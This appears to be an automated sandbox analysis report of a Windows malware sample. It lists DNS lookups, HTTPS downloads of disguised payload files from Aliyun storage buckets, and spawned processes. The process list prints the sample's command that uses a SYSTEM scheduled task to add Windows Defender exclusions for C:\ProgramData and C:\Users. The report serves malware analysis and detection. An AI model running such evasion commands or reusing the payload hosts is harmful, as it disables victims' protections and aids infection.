Jan 9, 2025 01:54:49.897428036 CET | 192.168.2.4 | 1.1.1.1 | 0xd06f | Standard query (0) | qsuula.net | A (IP address) | IN (0x0001) | false
Jan 9, 2025 01:54:55.934403896 CET | 192.168.2.4 | 1.1.1.1 | 0xd80a | Standard query (0) | qsuula.net | A (IP address) | IN (0x0001) | false
Jan 9, 2025 01:55:01.967978001 CET | 192.168.2.4 | 1.1.1.1 | 0xb1ac | Standard query (0) | qsuula.net | A (IP address) | IN (0x0001) | false
Jan 9, 2025 01:55:08.172561884 CET | 192.168.2.4 | 1.1.1.1 | 0xb78d | Standard query (0) | qsuula.net | A (IP address) | IN (0x0001) | false
Jan 9, 2025 01:55:14.208087921 CET | 192.168.2.4 | 1.1.1.1 | 0x7778 | Standard query (0) | qsuula.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 9, 2025 01:52:52.015211105 CET | 1.1.1.1 | 192.168.2.4 | 0x6ccb | No error (0) | a8mw1y.oss-cn-beijing.aliyuncs.com | | 59.110.190.44 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 01:54:14.426925898 CET | 1.1.1.1 | 192.168.2.4 | 0x1fcc | No error (0) | 22mm.oss-cn-hangzhou.aliyuncs.com | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 01:54:14.426925898 CET | 1.1.1.1 | 192.168.2.4 | 0x1fcc | No error (0) | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 01:54:14.426925898 CET | 1.1.1.1 | 192.168.2.4 | 0x1fcc | No error (0) | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | | 118.178.60.9 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 01:54:14.429665089 CET | 1.1.1.1 | 192.168.2.4 | 0x1fcc | No error (0) | 22mm.oss-cn-hangzhou.aliyuncs.com | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 01:54:14.429665089 CET | 1.1.1.1 | 192.168.2.4 | 0x1fcc | No error (0) | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 01:54:14.429665089 CET | 1.1.1.1 | 192.168.2.4 | 0x1fcc | No error (0) | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | | 118.178.60.9 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 01:54:49.907218933 CET | 1.1.1.1 | 192.168.2.4 | 0xd06f | Name error (3) | qsuula.net | none | none | A (IP address) | IN (0x0001) | false
Jan 9, 2025 01:54:55.943255901 CET | 1.1.1.1 | 192.168.2.4 | 0xd80a | Name error (3) | qsuula.net | none | none | A (IP address) | IN (0x0001) | false
Jan 9, 2025 01:55:01.977581978 CET | 1.1.1.1 | 192.168.2.4 | 0xb1ac | Name error (3) | qsuula.net | none | none | A (IP address) | IN (0x0001) | false
Jan 9, 2025 01:55:08.182514906 CET | 1.1.1.1 | 192.168.2.4 | 0xb78d | Name error (3) | qsuula.net | none | none | A (IP address) | IN (0x0001) | false
Jan 9, 2025 01:55:14.217396975 CET | 1.1.1.1 | 192.168.2.4 | 0x7778 | Name error (3) | qsuula.net | none | none | A (IP address) | IN (0x0001) | false
                                                                                      • a8mw1y.oss-cn-beijing.aliyuncs.com
                                                                                      • 22mm.oss-cn-hangzhou.aliyuncs.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 59.110.190.44 | 443 | 7572 | C:\Users\user\Desktop\2o63254452-763487230.06.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 00:52:53 UTC | 111 | OUT | GET /i.dat HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                                                                      Cache-Control: no-cache
2025-01-09 00:52:53 UTC | 557 | IN | HTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:52:53 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 512
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1DE56BDBB734395F57D8
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "C3BE870A726F627202B33B6AAD385CC2"
                                                                                      Last-Modified: Wed, 08 Jan 2025 11:05:12 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 253241388760715353
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000113
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: w76HCnJvYnICsztqrThcwg==
                                                                                      x-oss-server-time: 25


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 59.110.190.44 | 443 | 7572 | C:\Users\user\Desktop\2o63254452-763487230.06.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 00:52:55 UTC | 111 | OUT | GET /a.gif HTTP/1.1
User-Agent: GetData
Host: a8mw1y.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-09 00:52:55 UTC | 546 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 09 Jan 2025 00:52:55 GMT
Content-Type: image/gif
Content-Length: 135589
Connection: close
x-oss-request-id: 677F1DE70BFF4B3139771C80
Accept-Ranges: bytes
ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
Last-Modified: Wed, 08 Jan 2025 11:04:16 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 8642451798640735006
x-oss-storage-class: Standard
x-oss-ec: 0048-00000104
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
x-oss-server-time: 13


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 59.110.190.44 | 443 | 7572 | C:\Users\user\Desktop\2o63254452-763487230.06.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 00:52:56 UTC | 111 | OUT | GET /b.gif HTTP/1.1
User-Agent: GetData
Host: a8mw1y.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-09 00:52:57 UTC | 547 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 09 Jan 2025 00:52:57 GMT
Content-Type: image/gif
Content-Length: 125333
Connection: close
x-oss-request-id: 677F1DE972AE9E36365283EB
Accept-Ranges: bytes
ETag: "2CA9F4AB0970AA58989D66D9458F8701"
Last-Modified: Wed, 08 Jan 2025 11:04:16 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10333201072197591521
x-oss-storage-class: Standard
x-oss-ec: 0048-00000104
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
x-oss-server-time: 25


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 59.110.190.44 | 443 | 7572 | C:\Users\user\Desktop\2o63254452-763487230.06.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 00:52:58 UTC | 111 | OUT | GET /c.gif HTTP/1.1
User-Agent: GetData
Host: a8mw1y.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-09 00:52:59 UTC | 546 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 09 Jan 2025 00:52:59 GMT
Content-Type: image/gif
Content-Length: 10681
Connection: close
x-oss-request-id: 677F1DEBA645AE353698D08E
Accept-Ranges: bytes
ETag: "10A818386411EE834D99AE6B7B68BE71"
Last-Modified: Wed, 08 Jan 2025 11:04:15 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10287299869673359293
x-oss-storage-class: Standard
x-oss-ec: 0048-00000104
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
x-oss-server-time: 15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 59.110.190.44 | 443 | 7572 | C:\Users\user\Desktop\2o63254452-763487230.06.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 00:53:00 UTC | 111 | OUT | GET /d.gif HTTP/1.1
User-Agent: GetData
Host: a8mw1y.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-09 00:53:00 UTC | 547 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 09 Jan 2025 00:53:00 GMT
Content-Type: image/gif
Content-Length: 3892010
Connection: close
x-oss-request-id: 677F1DEC7FFDC235383FCA93
Accept-Ranges: bytes
ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
Last-Modified: Wed, 08 Jan 2025 11:04:19 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 3363616613234190325
x-oss-storage-class: Standard
x-oss-ec: 0048-00000104
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
x-oss-server-time: 15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49742 | 59.110.190.44 | 443 | 7572 | C:\Users\user\Desktop\2o63254452-763487230.06.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 00:53:09 UTC | 111 | OUT | GET /s.dat HTTP/1.1
User-Agent: GetData
Host: a8mw1y.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-09 00:53:09 UTC | 560 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 09 Jan 2025 00:53:09 GMT
Content-Type: application/octet-stream
Content-Length: 28272
Connection: close
x-oss-request-id: 677F1DF59F27CB35357018E8
Accept-Ranges: bytes
ETag: "6F93B0260C6726714C31FF7CCA6EDFCB"
Last-Modified: Thu, 09 Jan 2025 00:53:00 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 9194647615507018268
x-oss-storage-class: Standard
x-oss-ec: 0048-00000113
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: b5OwJgxnJnFMMf98ym7fyw==
x-oss-server-time: 17


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49744 | 59.110.190.44 | 443 | 7572 | C:\Users\user\Desktop\2o63254452-763487230.06.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 00:53:11 UTC | 111 | OUT | GET /s.jpg HTTP/1.1
User-Agent: GetData
Host: a8mw1y.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-09 00:53:11 UTC | 543 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 09 Jan 2025 00:53:11 GMT
Content-Type: image/jpeg
Content-Length: 8299
Connection: close
x-oss-request-id: 677F1DF75E34143331E8C9F9
Accept-Ranges: bytes
ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
Last-Modified: Wed, 08 Jan 2025 11:04:15 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 692387538176721524
x-oss-storage-class: Standard
x-oss-ec: 0048-00000104
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
x-oss-server-time: 4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 50010 | 118.178.60.9 | 443 | 5776 | C:\Users\user\Documents\BEqRkb.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 00:54:15 UTC | 114 | OUT | GET /drops.jpg HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                      Cache-Control: no-cache
2025-01-09 00:54:16 UTC | 545 | IN | HTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:54:16 GMT
                                                                                      Content-Type: image/jpeg
                                                                                      Content-Length: 37274
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1E38482D37303214142E
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                                                                      Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 9193697774326766004
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000105
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                                                                      x-oss-server-time: 8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 50011 | 118.178.60.9 | 443 | 5776 | C:\Users\user\Documents\BEqRkb.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 00:54:19 UTC | 110 | OUT | GET /f.dat HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                      Cache-Control: no-cache
2025-01-09 00:54:19 UTC | 558 | IN | HTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:54:19 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 879
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1E3B6FB42B3830D080E8
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "E54C4296F011EC91D935AA353C936E34"
                                                                                      Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 11142793972884948456
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000113
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                                                                      x-oss-server-time: 2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 50012 | 118.178.60.9 | 443 | 5776 | C:\Users\user\Documents\BEqRkb.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 00:54:21 UTC | 115 | OUT | GET /FOM-50.jpg HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                      Cache-Control: no-cache
2025-01-09 00:54:21 UTC | 546 | IN | HTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:54:21 GMT
                                                                                      Content-Type: image/jpeg
                                                                                      Content-Length: 55085
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1E3DA0BE373739B08967
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                                                                      Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 12339968747348072397
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000105
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                                                                      x-oss-server-time: 8
                                                                                      Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-*C.G!"#$g()*+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{|
                                                                                      2025-01-09 00:54:21 UTC4096INData Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91
                                                                                      Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~o


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 50013 | 118.178.60.9 | 443 | 5776 | C:\Users\user\Documents\BEqRkb.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 00:54:22 UTC | 115 | OUT | GET /FOM-51.jpg HTTP/1.1
User-Agent: GetData
Host: 22mm.oss-cn-hangzhou.aliyuncs.com
Cache-Control: no-cache
2025-01-09 00:54:23 UTC | 548 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 09 Jan 2025 00:54:23 GMT
Content-Type: image/jpeg
Content-Length: 4859125
Connection: close
x-oss-request-id: 677F1E3F0747933433603512
Accept-Ranges: bytes
ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02"
Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 9060732723227198118
x-oss-storage-class: Standard
x-oss-ec: 0048-00000105
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: 7myj7qf5scgQWa71cKKMAg==
x-oss-server-time: 14


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 50014 | 118.178.60.9 | 443 | 5776 | C:\Users\user\Documents\BEqRkb.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 00:54:33 UTC | 115 | OUT | GET /FOM-52.jpg HTTP/1.1
User-Agent: GetData
Host: 22mm.oss-cn-hangzhou.aliyuncs.com
Cache-Control: no-cache
2025-01-09 00:54:33 UTC | 547 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 09 Jan 2025 00:54:33 GMT
Content-Type: image/jpeg
Content-Length: 5062442
Connection: close
x-oss-request-id: 677F1E496E537B3837EA469F
Accept-Ranges: bytes
ETag: "70C21DA900796B279A09040B00953E40"
Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 360383310743409046
x-oss-storage-class: Standard
x-oss-ec: 0048-00000105
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: cMIdqQB5ayeaCQQLAJU+QA==
x-oss-server-time: 27


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.450015118.178.60.94435776C:\Users\user\Documents\BEqRkb.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 00:54:45 UTC115OUTGET /FOM-53.jpg HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                      Cache-Control: no-cache
Timestamp: 2025-01-09 00:54:45 UTC
Bytes transferred: 546
Direction: IN
Data:
HTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:54:45 GMT
                                                                                      Content-Type: image/jpeg
                                                                                      Content-Length: 366410
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1E556A91E53531D8D9A0
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "DA1D5EB665D3AAD523BE59415E6449ED"
                                                                                      Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 5641369857548672686
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000105
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q==
                                                                                      x-oss-server-time: 7



                                                                                      Target ID:0
                                                                                      Start time:19:52:09
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\Desktop\2o63254452-763487230.06.exe"
                                                                                      Imagebase:0x140000000
                                                                                      File size:30'965'248 bytes
                                                                                      MD5 hash:0C3951CFE848EAD37F11600EE5195006
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:19:53:10
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Users\user\Documents\BEqRkb.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Users\user\Documents\BEqRkb.exe
                                                                                      Imagebase:0x140000000
                                                                                      File size:133'136 bytes
                                                                                      MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:19:53:11
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Users\user\Documents\BEqRkb.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Users\user\Documents\BEqRkb.exe
                                                                                      Imagebase:0x140000000
                                                                                      File size:133'136 bytes
                                                                                      MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:19:54:01
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Users\user\Documents\BEqRkb.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Users\user\Documents\BEqRkb.exe
                                                                                      Imagebase:0x140000000
                                                                                      File size:133'136 bytes
                                                                                      MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Target ID:8
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:9
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:10
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:11
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Run /TN "Task1"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:12
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:13
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:14
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:15
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff697100000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:16
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:17
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
